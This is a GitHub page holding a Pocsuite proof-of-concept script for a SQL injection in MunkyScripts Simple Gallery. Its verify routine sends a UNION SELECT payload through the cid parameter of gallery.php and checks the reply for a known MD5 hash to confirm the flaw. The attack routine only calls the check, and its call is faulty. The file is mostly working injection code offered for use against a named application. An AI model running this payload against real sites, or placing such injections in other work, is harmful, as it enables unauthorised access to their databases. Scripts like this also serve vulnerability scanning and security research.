forked from njcx/pocsuite_poc_collect
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathMunkyScripts Simple Gallery SQL Injection Vulnerability.py
executable file
·52 lines (43 loc) · 1.41 KB
/
MunkyScripts Simple Gallery SQL Injection Vulnerability.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re
class TestPOC(POCBase):
vulID = '68151' # ssvid
version = '1.0'
author = ['0xFATeam']
vulDate = ''
createDate = '2016-01-08'
updateDate = '2016-01-08'
references = ['http://www.sebug.net/vuldb/ssvid-68151']
name = 'MunkyScripts Simple Gallery SQL Injection Vulnerability'
appPowerLink = ''
appName = 'MunkyScripts Simple Gallery'
appVersion = ''
vulType = 'Other'
desc = '''
'''
samples = ['']
def _verify(self):
payload = "/gallery.php?cid='/**/UNION/**/SELECT/**/1,2,(concat_ws(0x3a,md5(1))),4 %23"
response = req.get(self.url + payload)
return self.parse_output(response)
def _attack(self):
result = {}
#Write your code here
return self._verify(self)
def parse_output(self, response):
output = Output(self)
result = {}
if response:
m = re.search(r'c4ca4238a0b923820dcc509a6f75849b', response.content)
if m:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = response.url
output.success(result)
else:
output.fail('Internet Nothing Returned')
return output
register(TestPOC)